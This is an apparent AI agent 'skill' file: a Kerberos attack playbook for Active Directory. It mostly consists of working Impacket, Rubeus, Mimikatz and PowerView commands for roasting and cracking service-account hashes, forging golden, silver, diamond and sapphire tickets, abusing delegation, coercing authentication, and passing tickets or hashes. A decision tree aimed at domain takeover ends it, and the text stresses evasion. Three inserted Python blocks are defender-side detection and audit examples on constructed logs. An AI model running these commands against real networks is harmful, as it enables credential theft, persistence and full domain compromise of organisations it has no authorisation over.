active-directory-kerberos-attacks
# SKILL: Kerberos Attack Playbook — Expert AD Attack Guide
AI LOAD INSTRUCTION: Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs.
## 0. RELATED ROUTING
Before going deep, consider loading:
- active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos
- active-directory-certificate-services for ADCS-based persistence (golden certificate)
- ntlm-relay-coercion for NTLM relay attacks that complement Kerberos abuse
- windows-lateral-movement after obtaining tickets for lateral movement
### Advanced Reference
Also load KERBEROS_ATTACK_CHAINS.md when you need:
- Multi-step attack chains combining Kerberos with ACL abuse, ADCS, and relay
- End-to-end scenarios from foothold to domain admin
- Chained delegation attack flows
## 1. KERBEROS AUTHENTICATION PRIMER
```
Client                  KDC (DC)                  Service
  │                        │                         │
  │── AS-REQ ─────────────→│                         │  (1) Request TGT with user creds
  │←─ AS-REP ──────────────│                         │  (2) Receive TGT (encrypted with krbtgt hash)
  │                        │                         │
  │── TGS-REQ ────────────→│                         │  (3) Present TGT, request service ticket
  │←─ TGS-REP ─────────────│                         │  (4) Receive TGS (encrypted with service hash)
  │                        │                         │
  │── AP-REQ ───────────────────────────────────────→│  (5) Present TGS to service
  │←─ AP-REP ────────────────────────────────────────│  (6) Mutual auth (optional)
```

## 2. AS-REP ROASTING
For users with "Do not require Kerberos preauthentication" set, the KDC returns an AS-REP to anyone who asks, without proof of the password; the encrypted part of that reply can then be attacked offline.
### Enumerate Vulnerable Users

```bash
# Impacket — from Linux
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt

# Impacket — with domain creds (enumerate automatically)
GetNPUsers.py DOMAIN/user:password -dc-ip DC_IP -request

# Rubeus — from Windows (domain-joined)
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# PowerView — enumerate users
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
```

### Crack AS-REP Hash
```bash
# Hashcat mode 18200
hashcat -m 18200 asrep.txt rockyou.txt --rules-file best64.rule

# John
john asrep.txt --wordlist=rockyou.txt
```

---

## 3. KERBEROASTING
Any domain user can request a TGS for any account that has an SPN. The TGS is encrypted with the service account's key (its NTLM hash for RC4 tickets), so it can be taken offline and cracked.
### Request Service Tickets

```bash
# Impacket
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request -outputfile tgs.txt

# Rubeus (from Windows)
Rubeus.exe kerberoast /outfile:tgs.txt

# Rubeus — target specific SPN / high-value accounts
Rubeus.exe kerberoast /user:svc_sql /outfile:tgs_sql.txt

# PowerView + manual request
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db.domain.com"
```

### Crack TGS Hash
```bash
# Hashcat mode 13100 (RC4) or 19700 (AES)
hashcat -m 13100 tgs.txt rockyou.txt --rules-file best64.rule

# RC4 tickets crack much faster than AES256 — target RC4 if possible
# Rubeus: /tgtdeleg forces RC4 on some configs
Rubeus.exe kerberoast /tgtdeleg
```
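As an added detection example (not the playbook's own code), the DC-side view of both roasting techniques in sections 2 and 3: 4768 events with Pre-Authentication Type 0 reveal AS-REP-roastable accounts, and a burst of RC4 (etype 0x17) 4769 requests for many distinct service accounts from one principal is the Kerberoasting signature. The log records below are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23; the only ticket cipher hashcat modes 18200/13100 crack cheaply

# Constructed sample DC security-log records (not real logs). Field names follow
# the 4768/4769 event schema: Pre-Authentication Type, Ticket Encryption Type,
# Service Name (the account that owns the requested SPN).
EVENTS = [
    {"ts": "2024-05-01T08:00:00", "id": 4768, "user": "svc_legacy", "preauth": 0, "etype": 0x17},
    {"ts": "2024-05-01T08:01:00", "id": 4768, "user": "alice", "preauth": 2, "etype": 0x12},
    {"ts": "2024-05-01T08:05:00", "id": 4769, "user": "bob", "service": "svc_sql", "etype": 0x17},
    {"ts": "2024-05-01T08:05:01", "id": 4769, "user": "bob", "service": "svc_web", "etype": 0x17},
    {"ts": "2024-05-01T08:05:02", "id": 4769, "user": "bob", "service": "svc_backup", "etype": 0x17},
    {"ts": "2024-05-01T08:10:00", "id": 4769, "user": "alice", "service": "FS01$", "etype": 0x12},
]


def detect_roasting(events, window=timedelta(minutes=5), spn_threshold=3):
    """Return (user, reason) pairs for AS-REP roasting and Kerberoasting indicators."""
    findings = []
    rc4_tgs = defaultdict(list)  # requesting user -> [(ts, service account)]
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 4768 and ev["preauth"] == 0:
            # Pre-Authentication Type 0: the KDC returned an AS-REP with no proof of
            # the password, i.e. the encrypted part is now crackable offline.
            findings.append((ev["user"], "AS-REP issued without pre-authentication"))
        elif ev["id"] == 4769 and ev["etype"] == RC4_HMAC and ev["service"] != "krbtgt":
            # A single RC4 TGS is normal for accounts without AES keys; the signal is
            # one principal pulling RC4 tickets for many service accounts at once.
            rc4_tgs[ev["user"]].append((ts, ev["service"]))
    for user, reqs in rc4_tgs.items():
        for t0, _ in reqs:
            distinct = {svc for t, svc in reqs if t0 <= t <= t0 + window}
            if len(distinct) >= spn_threshold:
                findings.append((user, f"{len(distinct)} RC4 service tickets within {window}"))
                break
    return findings


if __name__ == "__main__":
    for user, reason in detect_roasting(EVENTS):
        print(f"{user}: {reason}")
```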
---

## 4. TICKET FORGING — GOLDEN, SILVER, DIAMOND, SAPPHIRE
### Golden Ticket
Forge a TGT using the `krbtgt` hash → impersonate any user, including non-existent ones.

```bash
# Impacket — forge golden ticket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM administrator

# Mimikatz
kerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt

# Rubeus
Rubeus.exe golden /rc4:KRBTGT_HASH /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /ptt
```

**Prerequisites**: krbtgt NTLM hash (from DCSync or NTDS.dit)
**Persistence**: Valid until the krbtgt password is changed **twice**
### Silver Ticket
Forge a TGS using the service account's hash → access to that specific service only, with no KDC interaction.

```bash
# Impacket — forge silver ticket for CIFS (file share)
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM -spn cifs/target.domain.com administrator

# Mimikatz
kerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /target:target.domain.com /service:cifs /rc4:SERVICE_HASH /ptt
```

| Target Service | SPN Format | Use Case |
|---|---|---|
| File shares | `cifs/host` | Access SMB shares |
| WinRM | `http/host` | Remote PowerShell |
| LDAP | `ldap/dc` | DCSync-like queries |
| MSSQL | `MSSQLSvc/host:1433` | Database access |
| Exchange | `http/mail.domain.com` | Mailbox access |

### Diamond Ticket
Modify a legitimately issued TGT → harder to detect than a golden ticket.

```bash
# Rubeus — request real TGT then modify PAC
Rubeus.exe diamond /krbkey:KRBTGT_AES256 /user:administrator /domain:DOMAIN.COM /dc:DC01.DOMAIN.COM /ticketuser:targetadmin /ticketuserid:500 /groups:512 /ptt
```

**Advantage**: The ticket's metadata (timestamps, enc type) matches a real TGT issuance.

### Sapphire Ticket
Uses S4U2Self to obtain a real PAC for the target user, then embeds it in a forged ticket.

```bash
# Rubeus
Rubeus.exe diamond /krbkey:KRBTGT_AES256 /ticketuser:administrator /ticketuserid:500 /groups:512 /tgtdeleg /ptt
```

**Advantage**: The PAC is a genuine copy from the KDC, making detection extremely difficult.
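As an added defender-side example (not part of the original playbook), the correlation that catches the tickets in this section that never passed through the KDC: a golden ticket surfaces as a 4769 TGS request for an account with no 4768 TGT issuance on any DC, and a silver ticket as a Kerberos logon (4624) on the host with no 4769 naming that host. Diamond and sapphire tickets begin with a genuine AS-REQ and therefore pass this check, which is exactly the advantage described above. Event field names and sample records are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample records merged from the DC (4768/4769) and a file server
# (4624) security log; not real logs. A forged ticket skips the issuance step it
# pretends to have had, so its first trace is a *use* event with no earlier
# *issuance* event for the same account.
LOG = [
    {"ts": "2024-05-01T09:00:00", "id": 4768, "host": "DC01", "user": "alice"},
    {"ts": "2024-05-01T09:00:05", "id": 4769, "host": "DC01", "user": "alice", "service": "cifs/FS01.domain.com"},
    {"ts": "2024-05-01T09:00:06", "id": 4624, "host": "FS01", "user": "alice", "auth": "Kerberos"},
    # TGS requested for an account that no DC ever issued a TGT to (golden ticket pattern)
    {"ts": "2024-05-01T10:30:00", "id": 4769, "host": "DC01", "user": "administrator", "service": "ldap/DC01.domain.com"},
    # Kerberos logon on FS01 although no DC issued a TGS for that host (silver ticket pattern)
    {"ts": "2024-05-01T11:00:00", "id": 4624, "host": "FS01", "user": "administrator", "auth": "Kerberos"},
]


def _spn_host(spn):
    """'cifs/FS01.domain.com:445' -> 'FS01'."""
    return spn.split("/", 1)[1].split(":")[0].split(".")[0].upper()


def find_orphan_tickets(events, lookback=timedelta(hours=10)):
    """Flag ticket-use events whose issuance event is missing.

    4769 proves a TGT was presented       -> expect an earlier 4768 for the account
    4624 (Kerberos) proves a TGS was used -> expect an earlier 4769 naming that host
    `lookback` must cover the maximum ticket lifetime including renewals (10 h
    TGT by default, renewable up to 7 days) and `events` must merge the logs of
    every DC, otherwise legitimately issued tickets are flagged as well.
    """
    events = sorted(events, key=lambda e: e["ts"])
    findings = []
    for i, ev in enumerate(events):
        t = datetime.fromisoformat(ev["ts"])
        earlier = [p for p in events[:i] if p["user"] == ev["user"]
                   and t - datetime.fromisoformat(p["ts"]) <= lookback]
        if ev["id"] == 4769 and not any(p["id"] == 4768 for p in earlier):
            findings.append((ev["user"], "TGS requested without any TGT issuance (forged TGT?)"))
        elif ev["id"] == 4624 and ev.get("auth") == "Kerberos" and not any(
                p["id"] == 4769 and _spn_host(p["service"]) == ev["host"].upper() for p in earlier):
            findings.append((ev["user"], f"Kerberos logon on {ev['host']} without TGS issuance (forged TGS?)"))
    return findings


if __name__ == "__main__":
    for user, reason in find_orphan_tickets(LOG):
        print(f"{user}: {reason}")
```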
---

## 5. DELEGATION ATTACKS
### Unconstrained Delegation
Hosts with unconstrained delegation keep the TGT of every user that authenticates to them in memory.

```bash
# Enumerate (PowerView)
Get-DomainComputer -Unconstrained | Select-Object dnshostname

# Coerce admin authentication → capture TGT (Rubeus monitor mode)
Rubeus.exe monitor /interval:5 /nowrap

# Trigger via PrinterBug / PetitPotam → DC authenticates → TGT captured
SpoolSample.exe DC01.domain.com COMPROMISED_HOST.domain.com
```

### Constrained Delegation (S4U2Proxy)
```bash
# Enumerate
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname,msds-allowedtodelegateto

# S4U2Self + S4U2Proxy → get TGS for allowed service as any user
getST.py -spn cifs/target.domain.com -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP

# Rubeus
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt
```

### Resource-Based Constrained Delegation (RBCD)
Requires write access to `msDS-AllowedToActOnBehalfOfOtherIdentity` on the target.

```bash
# 1. Create or control a computer account (MAQ > 0)
addcomputer.py -computer-name 'FAKE$' -computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password

# 2. Set RBCD on target
rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write DOMAIN/user:password

# 3. S4U2Self + S4U2Proxy from controlled account
getST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE$':'P@ss123' -dc-ip DC_IP

# 4. Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/administrator@TARGET.DOMAIN.COM
```
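An added audit example (not the playbook's code) that reads the same attributes the PowerView one-liners in this section query, but from the defender's side: it decodes the userAccountControl bits for unconstrained delegation, protocol transition and disabled pre-authentication, lists constrained and RBCD grants, and flags privileged accounts that are not marked sensitive. The directory records are constructed, and the RBCD security descriptor is assumed to be already resolved to account names.

```python
# userAccountControl bits that matter for Kerberos delegation and pre-auth
SERVER_TRUST_ACCOUNT           = 0x0002000   # domain controller
TRUSTED_FOR_DELEGATION         = 0x0080000   # unconstrained delegation
NOT_DELEGATED                  = 0x0100000   # "account is sensitive and cannot be delegated"
DONT_REQ_PREAUTH               = 0x0400000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition

# Constructed directory records (not a real export). "allowedTo" stands for
# msDS-AllowedToDelegateTo and "rbcd" for the principals named in
# msDS-AllowedToActOnBehalfOfOtherIdentity, pre-resolved from SIDs to names.
ACCOUNTS = [
    {"name": "DC01$", "uac": 0x82000, "adminCount": 0, "allowedTo": [], "rbcd": []},
    {"name": "WEB01$", "uac": 0x81000, "adminCount": 0, "allowedTo": [], "rbcd": []},
    {"name": "svc_web", "uac": 0x1000200, "adminCount": 0, "allowedTo": ["cifs/FS01.domain.com"], "rbcd": []},
    {"name": "FS01$", "uac": 0x1000, "adminCount": 0, "allowedTo": [], "rbcd": ["FAKE$"]},
    {"name": "svc_legacy", "uac": 0x400200, "adminCount": 0, "allowedTo": [], "rbcd": []},
    {"name": "administrator", "uac": 0x200, "adminCount": 1, "allowedTo": [], "rbcd": []},
    {"name": "alice", "uac": 0x200, "adminCount": 0, "allowedTo": [], "rbcd": []},
]


def audit_delegation(accounts):
    """Return (account, finding) pairs for every delegation or pre-auth weakness."""
    findings = []
    for a in accounts:
        uac, name = a["uac"], a["name"]
        # DCs are unconstrained by design; any other host caching callers' TGTs is a finding
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings.append((name, "unconstrained delegation on a non-DC: caches every caller's TGT"))
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, "constrained delegation with protocol transition to " + ", ".join(a["allowedTo"])))
        elif a["allowedTo"]:
            findings.append((name, "constrained delegation (Kerberos only) to " + ", ".join(a["allowedTo"])))
        if a["rbcd"]:
            findings.append((name, "RBCD lets " + ", ".join(a["rbcd"]) + " impersonate users to this host"))
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "Kerberos pre-authentication disabled"))
        # Without NOT_DELEGATED (or Protected Users membership) the S4U chains above
        # can mint service tickets in this account's name.
        if a["adminCount"] and not uac & NOT_DELEGATED:
            findings.append((name, "privileged account not marked 'sensitive, cannot be delegated'"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_delegation(ACCOUNTS):
        print(f"{name}: {finding}")
```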
---

## 6. PASS-THE-TICKET & OVERPASS-THE-HASH
### Pass-the-Ticket
```bash
# Impacket — use .ccache ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com

# Mimikatz — inject .kirbi ticket into session
kerberos::ptt ticket.kirbi

# Rubeus
Rubeus.exe ptt /ticket:base64_ticket_blob
```

### Overpass-the-Hash (Pass-the-Key)
Use an NTLM hash to request a Kerberos TGT → pure Kerberos authentication (avoids NTLM logging).

```bash
# Impacket
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache

# Rubeus (from Windows)
Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt

# Mimikatz
sekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe
```

---

## 7. KERBEROS DOUBLE HOP PROBLEM
When authenticating via Kerberos across two hops (A → B → C), B cannot forward A's credentials to C by default.
### Solutions
| Method | How | Risk |
|---|---|---|
| CredSSP | Sends actual credentials to B | Credential exposure |
| Unconstrained delegation on B | B stores A's TGT | Over-privileged |
| Constrained delegation | B allowed to delegate to C | Preferred — scoped |
| RBCD | C trusts B to delegate | Modern, flexible |
| Invoke-Command nested | Re-authenticates inside the nested session | Exposes password in script |
## 8. KERBEROS ATTACK DECISION TREE
```
AD environment — targeting Kerberos
│
├── Have domain user creds?
│   ├── Kerberoast → crack service account hashes (§3)
│   ├── Enumerate users without preauth → AS-REP roast (§2)
│   ├── Enumerate delegation → unconstrained/constrained/RBCD (§5)
│   └── Enumerate SPNs for high-value accounts
│
├── Have service account hash?
│   ├── Silver ticket for that service (§4)
│   └── If constrained delegation → S4U2Proxy chain (§5)
│
├── Have krbtgt hash?
│   ├── Golden ticket → any user, any service (§4)
│   ├── Diamond ticket → stealthier forging (§4)
│   └── Sapphire ticket → hardest to detect (§4)
│
├── Compromised host with unconstrained delegation?
│   ├── Monitor for incoming TGTs (Rubeus monitor)
│   ├── Coerce DC authentication (PrinterBug/PetitPotam)
│   └── Capture DC TGT → DCSync
│
├── Can write to target's msDS-AllowedToActOnBehalfOfOtherIdentity?
│   └── RBCD attack (§5) → create machine account + delegate
│
├── Have NTLM hash but need Kerberos auth?
│   └── Overpass-the-Hash → request TGT (§6)
│
└── Have .kirbi / .ccache ticket?
    └── Pass-the-Ticket → use directly (§6)
```